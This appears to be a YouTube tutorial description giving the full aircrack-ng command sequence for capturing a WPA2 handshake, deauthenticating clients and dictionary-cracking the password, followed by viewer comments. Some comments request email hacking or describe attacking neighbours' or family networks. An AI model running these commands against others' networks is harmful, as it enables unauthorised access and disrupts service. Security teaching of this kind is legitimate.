Menu: Use airmon-ng to crack WiFi networks: 0:00 Network Adapter to use: 0:46 Kali Linux setup: 1:20 Plug in network adapter: 1:35 Verify that network adapter is recognized by Kali Linux: 2:04 WPA2 network to crack: 2:43 iwconfig: 3:27 Kali Version: 3:34 Kill conflicting processes with airmon-ng: 3:55 Put interface into monitor mode: 4:32 Discover WiFi Networks with airodump-ng: 5:15 Use airodump-ng to view only one network: 6:20 Connect to network using an iPhone: 6:39 airodump-ng capture WPA2 four way handshake: 6:58 Use aireplay-ng to deauthenticate clients: 7:25 WPA2 four way handshake captured: 8:08 Use Wireshark to view WPA2 four way handshake: 8:38 Put interface back into managed mode: 9:30 Crack WPA2 password with aircrack-ng: 10:10 Password cracked: 11:00 WiFi router WPA2 settings: 12:00 Summary: 12:40 ================ Network Adapters: ================ Alfa AWUS036NHA: amzn.to/3qbQGKN Alfa AWUSO36NH: amzn.to/3moeQiI ================ Commands used: ================ ! See version of Kali cat /etc/os-release uname -a ! See interfaces ip addr iwconfig !kill processes sudo airmon-ng check kill !Start monitor mode sudo airmon-ng start wlan0 !Verify that monitor mode is used sudo airmon-ng !You could also use iwconfig to check that interface is in monitor mode: iwconfig ! Get the AP's MAC address and channel sudo airodump-ng wlan0mon ! AP-MAC & channel - you need to select your own here: ESSID: 90:9A:4A:B8:F3:FB Channel used by AP for SSID: 2 !1st Window: !Make sure you replace the channel number and bssid with your own !Replace hack1 with your file name like capture1 or something sudo airodump-ng -w hack1 -c 2 --bssid 90:9A:4A:B8:F3:FB wlan0mon !2nd Window - deauth attack !Make sure you replace the bssid with your own sudo aireplay-ng --deauth 0 -a 90:9A:4A:B8:F3:FB wlan0mon !Use Wireshark to open hack file wireshark hack1-01.cap !Filter Wireshark messages for EAPOL eapol !Stop monitor mode airmon-ng stop wlan0mon !Crack file with Rock you or another wordlist !Make sure you have rockyou in text format (unzip file on Kali) !Replace hack1-01.cap with your file name aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt ================ Previous videos: ================ Kali Installation: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-VAMP8DqSDjg.html WPA2 GPU password cracking: ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-J8A8rKFZW-M.html Wordlists (rockyou): ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-rgWcguAg-XA.html ================ Connect with me: ================ Discord: discord.com/invite/usKSyzb Twitter: twitter.com/davidbombal Instagram: instagram.com/davidbombal LinkedIn: www.linkedin.com/in/davidbombal Facebook: facebook.com/davidbombal.co TikTok: tiktok.com/@davidbombal RU-vid: ru-vid.com ================ Support me: ================ Buy my CCNA course and support me: DavidBombal.com: CCNA ($10): bit.ly/yt999ccna Udemy CCNA Course: bit.ly/ccnafor10dollars GNS3 CCNA Course: CCNA ($10): bit.ly/gns3ccna10 ====================== Special Offers: ====================== Boson software: 15% discount Link: bit.ly/boson15 Code: DBAF15P Please note that links listed may be affiliate links and provide me with a small percentage/kickback should you use them to purchase any of the items listed or recommended. Thank you for supporting me and this channel!
You way to explain is very good ,please keep it up... Please make some video on windows admin password bypass or hacking or email account hacking ..Thanks
your teaching thieves or want to be thieves! the man pages for aircrack-ng and others in the suite is more than enough information or tutorial for any ethical use! fortunately the reality of wpa2 with 1x8^120 to 1x64^120 possibilities and roughly a 3000 keys per second with descent hardware a 100 to 10000 year run is unpractical. collecting ssid and handshakes and mac addresses is easy dose not even require linux or monitor mode but brute forcing any strong password over 14 chars long is not going to happen , you should examine your ethics sir because your audience isnt going to set up a pertest lab or ask permission of a network owner no matter how many times you ask them not to! anyone with any true interest in pen testing will have enough system and network admin knowledge to be functional with a man page nor would they require the detailed explanations you give on basic principals. hopefully no one you care about becomes a victim of someone you taught
Hey, I've followed this tutorial and for some reason my deauth attack isn't working. I've even tried mdk4 and it's just not kicking me from the network and not capturing the handshake. I've looked all over the internet for a solution but have yet to find one. So now I ask you! David Bombal community, if you are here then you are most likely highly intelligent. How about sharing some knowledge with your boy
@@itsme7570 you followed the tutorial and its not working....... do you understand what you are doing? its a signal strength issue...you have one radio connected to another and a third is trying to say louder no not that radio this one.....but it isnt louder than the first radio so you get squat....now why are you trying to learn how to steal?
After watching first video in your channel, It took only 2 minutes to decide weather i want to subscribe your channel or not. Love this. Such an awesome presentation. ♥
Hey! Mr. David Bombal, thanks a million. I am from Tijuana, Mexico, I am 53, and I just get this "KALI LINUX" os, with knowing nothing what so ever about this LINUX SYSTEM. So, as you can imagine, I've whatched so many video tutorials, and well, I'm a little confused with all this commands, and passwords, but I'm doing a little progres in understanding the basics. And let me tell you, that until I watched your video here, I finally get to run the tools in the AIRCRACK-NG SUITE. The way you exp;ain step by step, it"s so clear, THAT EVEN ME GET TO UNDERSTAND WHAT TO DO, AND WHAT EXACTLY IS THE PROGRAM DOING WITH EACH ONE OF THE COMMANDS. THANK YOU SIR. I hope that my written engish is not so bad, and you get may gratitude.
I am computer consultant 1991 Melbourne Fl . Degree in electric engineering major computer input -output I did make living recovering , braking password , Old days 500 dollars maybe 1 hours ? Upset employees password all network and quit many times . . I really thanks You David deep from my heart for educating young people ... We needed that in America ...
I must say that you are indeed an excellent teacher. You did not explain what to do after I have the HANDSHAKE I'll be glad to hear from you. Thank you very much.
I Love your setup and the blue back light, your way of explaining things is very easy to understand, you should consider teaching a CEH course online or in Udemy Thank You Sir Mad Respect 🙏🏼
Something I'd recommend if you are using kali in a live environment (i.e. it isn't your main system you are doing anything on) is to sudo su so you don't have to type sudo before every command. Especially useful when you are learning.
yeah make sure it's not your main system LOL I don't want to think about how much data has been lost to people not realizing they're superuser and rm rf ing their whole file system
Deven I think you miss the point for those that will use it for malicious intentions like noobs and the likes of he has give a demonstration of the very thing and precise education on how to he might as well have done now giving as incompetent it be presenting yourself to be a cyber security specialist it’s a bit of irony don’t you think of teaching people how to crack a WiFi network what’s it for other cyber security analysts that would already have taught that it college or perhaps anywhere else that give a recognised certificate in giving you implement security against such things what’s is it for a reminder on how to do it right or perhaps a procedure just in case you checking for vulnerability’s or the strength of the key the point is Deven that he is showing the world as in how to crack a network illegally on a public platform which I think you missed wither he is using it for black hat or not or he considers himself white he has give a class on how break into a WiFi network why not teach as it’s presented how to stop such attacks as in a class on ips or ids with maybe how to compile a firewall like P-fense highlighted comment well if someone breaks into my network i will tell the government it’s cyber analyst taught them how and hold them to account the fucking irony he’s not using it for black-hat he might as well.
My lenovo laptop has intel wireless adapter with monitor capablity. Installed kali linux on usb drive and cracked the password. Great tutorial. Thanks.
Can you please help me? Iam in the same situation as you with a rtl8723be that let's me get it into monitor mode and all.. I installed live Kali Linux on my USB drive and tried to crack wifi with it but ah I just cant get the password at the last moment.. it always shows "key not found" And most of the time I can't even get the Wpa handshake while doing the de-auth thing
Great video. I'm 55 years old and just starting my path. I have always loved technology. My parents would drop me at radio shack and I would play on the old tandy's for hours. I learned alot from this video and it helped me to make more sense of things. Thanks for sharing.
Just a heads up, the router ESSID names you have redacted are visible for a brief period of time between timestamp 6:49 and 6:50. Also, thank you for the video! Very informative and simplified.
Very nice info, there's still no better way to crack WPA2.... only if the WPS is active. Which version kali are you using? And that terminal looks so clean! very nice set up!
Thanks for the great content! I've done some of this in Virtual Box. I did notice that VMs can be picky about the brand or version of wi-fi devices. Some better than others. Looking forward to duplicating this video in my lab environment. :-)
its the adapters chipset some do not support instructions given in airx-ng ,,and vms in general have issues with internal hardware and ownership so usb adapters sidestep that issue
@@mobiousenigmaI am using kali in a virtual box but it won't show me the wireless network as it reads that network as an internal network and shows it as a wired network (eth0) instead. How to fix it?
When I put my card in monitor mode and remove it from monitor mode with the airmon-ng commands , iw dev still shows it in monitor mode. Also airmon-ng doesn't rename it to wlan0mon, it stays at wlan0, but monitor mode works.
Hi David, you seem to be a cut above the other RU-vid presenters in this subject. I suspected you might be a professional presenter, and it looks like you are... QUESTION: do you have a course or series of courses that would get me to a stage where I could sit for the Cisco CCNA exams with a reasonable expectation of passing them? Then maybe the CCNA Security specialties? Money no object my company will pay...
Excelente video, thank you so much, I saw many blogs and they didn't explain as good as you. I thought I wouldn't find videos like this in RU-vid jajaja.
A great video we went over this in class I had notes to the best of the circumstances lectures happen fast. This helped me fill in the holes. Great video. Thank you!
You will not getting the handshake if there was no known device try to connect to the network. You need to wait until a known device connecting to the target wifi. It consumes time.
Thank you for the lesson, finaly learned how to use aireplay and etc, doing all this lesson steps via a rapsberrypi 3b+ , in the end it takes about 8 hours or more to crack the password, if aircrack can do it, probably better to store the .cap file in a usb drive and crack it using my main pc to see the results (do this on your own network, deauth will make the network unusable while running, so probably your neighbor that makes a lot of noise will notice it)
When you mentioned ‘decrypting’ or ‘hacking’ the password, I believe you meant ‘cracking the hash.’ Hashes are not encrypted data; they are the result of a hashing function. In the context of capturing a Wi-Fi hash, the correct term is ‘crack the hash’ correct? love your videos.
Hello sir. I hv seen lots n lots video different kind of tutorials. But the ur way of explanation. It really outstanding. It's very feel us easy even hard concept
lesson of the day "The best way to predict the future is to create it." Thanks a lot for creating this video i really enjoyed watching it and yeah you have a new subscriber.
After a long time I found a suitable video. Thanks man. And I also wanna request that will you please upload videos on teaching c++, http and other programming languages.
nice video but lots of the time, the password used by people is the default password under the internet box. I reckon it's more difficult to crack than a "hello hello" password... What do you think?
Great training video learnt a lot, had a few issues along the way that were resolved and my understanding is much better, hope i can start to remember some commands there is so much syntax is Linux.
I’m trying to make a deauther with a rpi0 and a 2.4/5 ghz WiFi adaptor and it works but it only disconnects all phones on the network no pc are affected I’m using airmon-ng and have been working on this for a very long time so any help would be appreciated thanks
At 4:58 I successfully changed to Monitor mode, but the name of the connection is still "wlan0". I tried it as a root user as well. I can't follow the next steps, because I can't see connections. What do you think what should I do to be able to witch it to "wlan0mon" properly? Any idea what should I change or fix? Thanks.
Hi David, great stuff as always. One question - when we deauth a device (phone), will that device try to connect to the access point by itself or we must manually connect it to the access point?
when you get blocked from dad's wifi because youre deauthenticating a "fatherless little brother" who stays up late in the morning...we do a little trolling😂
Excellent video David. Out of curiosity how did you get your terminal prompt to look so beautiful. Mine looks sooo plain... Can you please share the secret? 🙏👍👌
ada banyak masalah sebenarnya menggunakan aircrack-ng tapi slama saya ini aircrack sangat efektif dibanding yang lain..itu tergantung anda membuat daftar sandi dan perangkat yang anda pakai..dan terkahir seberapa kuat anda mengoprasikan aircrack..the best tools
i have to tell you that you are great..this is the best channel i have ever seen ,and you have a talent in explaination..i would like to thank you,,and i hope some lessons about data recovery..please.
With all respect this methods you demonstrated sir was in my grad ma ages and my high school hobbies and too old... Talk about rainbow tables or bypassing methods or GPU crackling
I will never think in attacking any network bu mine, pinky promess... keep creating awesome content! my (neigh..) own wifi network needs to be cracked!
first time watching this video it was complicated and didn't make sense to me, because i just wanted to hack the Wi-Fi but now I have learned kali Linux and have some clue in this game I understand you and your videos are so helpful 🔥🔥. but I would not recommend for beginners to watch you😂
Thanks David. Learned a lot. Appreciate your tranquility when you're talking. It makes it easy to follow. I want to use the learnings for hardening my own security. In this respect my two questions are the following. I use mac address authentication for my wireless LAN (as opposed to wifi internet access for guests) and the SSID for it is not being broadcasted. Makes these two measures my LAN more difficult to hack. Thanks for your answer in advance.
Hi David! I know I am late to the party, but would this method work for someone running Mac OS and using an USB-3 to USB-C adapter for the network adapter?
When around the command to kill everything and then switch my wireless adapter from from managed to monitor mode it still remains as WLAN zero but physically the adapter is dead there's no LED status light
Dear Mr. Bombal, I would like to express my gratitude for your valuable videos and training. I have a significant inquiry regarding my role as a network engineer in a small broadcasting company. Our company's network is DHCP-based, utilizing Cisco Catalyst 3560 switches. Currently, all users are able to connect to the internet by simply plugging into wall jacks, which aligns with our company policy. However, a major issue arises when users configure and connect WiFi routers to the network, creating their own separate WiFi networks alongside the company network. I am seeking guidance on how to effectively prevent this unauthorized practice. Thank you for your attention to this matter.
I tried this with my Kali Linux and it doesn't work. The deauth method does not deauthenticate the stations, so without this there is not reconnect thus not allowing for the capture of a 4 way handshake.
In my house we have not only one WLAN router we got one downstairs on in the living one on the bedroom and on the roof . When I am looking now with the airmon-ng tool I see multiple names of the name of my wifi ... Wich one should I coose or does all work the same if I wanna get the Handshake 😢